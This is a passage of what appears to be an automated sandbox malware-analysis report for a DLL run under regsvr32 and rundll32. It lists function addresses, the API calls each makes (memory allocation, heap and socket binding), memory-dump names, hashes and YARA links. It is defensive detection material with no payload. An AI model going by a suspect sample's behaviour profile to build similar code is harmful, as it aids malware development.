Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6048 Parent PID: 4616 rundll32.exeCOMMON

Executed Functions

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(02D20628), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32 ref: 1002AE41
GlobalHandle.KERNEL32(02D20628), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 1003C809
___getlocaleinfo.LIBCMT ref: 1003C81E
___getlocaleinfo.LIBCMT ref: 1003C833
___getlocaleinfo.LIBCMT ref: 1003C848
___getlocaleinfo.LIBCMT ref: 1003C860
___getlocaleinfo.LIBCMT ref: 1003C875
___getlocaleinfo.LIBCMT ref: 1003C887
___getlocaleinfo.LIBCMT ref: 1003C89C
___getlocaleinfo.LIBCMT ref: 1003C8B4
___getlocaleinfo.LIBCMT ref: 1003C8C9

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
